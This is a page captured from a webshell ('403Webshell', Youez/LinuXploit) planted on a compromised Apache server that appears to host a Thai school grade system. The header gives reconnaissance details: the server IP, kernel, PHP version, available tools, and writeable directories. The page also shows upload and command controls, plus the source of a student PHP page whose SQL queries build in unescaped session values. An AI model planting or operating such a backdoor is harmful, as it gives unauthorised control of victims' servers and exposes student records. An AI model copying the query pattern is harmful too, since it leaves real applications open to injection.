403Webshell
Server IP : 61.19.30.66  /  Your IP : 216.73.216.59
Web Server : Apache/2.2.22 (Ubuntu)
System : Linux klw 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:39:31 UTC 2014 x86_64
User : www-data ( 33)
PHP Version : 5.3.10-1ubuntu3.48
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/gpa/students/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/gpa/students/add.php
<?php include("../config/configuser.inc.php");?>
<?
require_once "../head.php";
$usernamestudent=$objResult["Username"];
$cllass=$objResult["cllass"];
$room=$objResult["room"];
?>


<?
$sql3="SELECT configri,configro,totals FROM configregis where configri='$cllass' and configro='$room'";
$result3 = mysql_query($sql3);
while (list($configri,$configro,$totals) = mysql_fetch_row($result3)) {
$c1 = $configri;
$c2  = $configro;
$c3=$totals;
}

?>	
<html>
<head>
<title>-:- ADMIN -:-</title>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="style.css" rel="stylesheet" type="text/css">
</head>

<body bgcolor="#FFFFFF">

<table width="75%" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr> 
          <td><div align="right"><font color="#ff0000" size="2"><font color="#333333">ยินดีต้อนรับ 
              :</font> <font color="#ff0000"> <? echo "$usernamestudent"; ?> &nbsp;&nbsp;<?=$objResult["Name"];?> <?=$objResult["cllass"];?>/<? echo "$room"; ?>
              <font color="#666666">เข้าสู่ระบบค่ะ </font></font></font></div></td>
        </tr>
        <tr> 
          <td><div align="right"><font color="#666666" size="2"><a href="user_page.php">หน้าหลักระบบ</a> 
              | <a href="logout.php">ออกจากระบบ</a></font></div></td>
        </tr>
  
</table>
<?
$crsql="SELECT sum(planx) FROM `transcriptintall`
WHERE  idstin='$usernamestudent'";
$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
$dcrd = mysql_fetch_array($slr);
$plansum1=$dcrd[0];

?>
<?
require_once "homein.php";
//require_once "home12.php";
?>

<? if($cllass==$c1 and $room=$c2)
 {
    echo "<span style=\"color: AA0000;\"></span>";
	include("homein1.php");
	break;
 }
 else if($cllass!=$c1 and $room!=$c2)
 {
    echo "<span style=\"color: AA0000;\">ไม่ต้องลงวิชาเลือก/ปิดระบบ</span>";
 }
?>


</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit